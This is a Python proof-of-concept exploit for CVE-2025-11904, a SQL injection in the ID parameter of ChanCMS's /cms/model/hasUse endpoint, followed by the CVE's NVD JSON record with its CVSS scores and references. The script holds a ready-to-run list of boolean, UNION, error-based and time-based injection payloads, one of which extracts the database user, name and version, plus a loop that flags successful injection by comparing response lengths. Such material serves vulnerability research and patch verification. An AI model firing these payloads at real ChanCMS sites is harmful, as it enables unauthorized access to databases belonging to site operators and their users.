CVE-2025-11904

# CVE-2025-11904 - ChanCMS hasUse SQL Injection PoC # Vulnerability: SQL Injection via ID parameter in /cms/model/hasUse # Affected: ChanCMS <= 3.3.2 # CVSS: 6.3 (Medium) import requests TARGET_URL = "http://target.com" INJECTION_PATH = "/cms/model/hasUse" # Step 1: Normal request to verify endpoint availability def check_endpoint(session, base_url): """Check if the vulnerable endpoint exists""" url = f"{base_url}{INJECTION_PATH}" try: resp = session.get(url, timeout=10) return resp.status_code except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return None # Step 2: Basic SQL injection test def test_sqli(session, base_url, id_value): """Test SQL injection with crafted ID parameter""" url = f"{base_url}{INJECTION_PATH}" # Inject payload into ID parameter params = {"id": id_value} headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } try: resp = session.get(url, params=params, headers=headers, timeout=10) return resp.text except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return None # Step 3: Exploit payloads PAYLOADS = [ # Boolean-based blind injection "1' AND '1'='1", "1' AND '1'='2", # UNION-based injection "1' UNION SELECT 1,2,3-- -", "1' UNION SELECT user(),database(),version()-- -", # Error-based injection "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -", # Time-based blind injection "1' AND SLEEP(5)-- -", "1'; WAITFOR DELAY '0:0:5'-- -", ] def main(): session = requests.Session() # Verify endpoint status = check_endpoint(session, TARGET_URL) print(f"[*] Endpoint status: {status}") # Test with normal value normal_resp = test_sqli(session, TARGET_URL, "1") print(f"[*] Normal response length: {len(normal_resp) if normal_resp else 'N/A'}") # Test injection payloads for i, payload in enumerate(PAYLOADS, 1): print(f"\n[*] Testing payload {i}: {payload}") resp = test_sqli(session, TARGET_URL, payload) if resp: print(f"[+] Response length: {len(resp)}") # Check for differences indicating successful injection if normal_resp and len(resp) != len(normal_resp): print(f"[!] Possible injection detected - response length differs") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11904", "sourceIdentifier": "[email protected]", "published": "2025-10-17T15:15:38.353", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in yanyutao0402 ChanCMS up to 3.3.2. This affects the function hasUse of the file /cms/model/hasUse. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chancms:chancms:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3.2", "matchCriteriaId": "0B10CAA4-5D61-42E1-B3FF-BAC534A355B2"}]}]}], "references": [{"url": "https://github.com/NarcherAlter/Security_Note/blob/main/Vulnerability_Discovery/ChanCMSv3.3.2.md#222", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/NarcherAlter/Security_Note/blob/main/Vulnerability_Discovery/ChanCMSv3.3.2.md#cmsmodelhasuse", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328914", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328914", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.670274", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}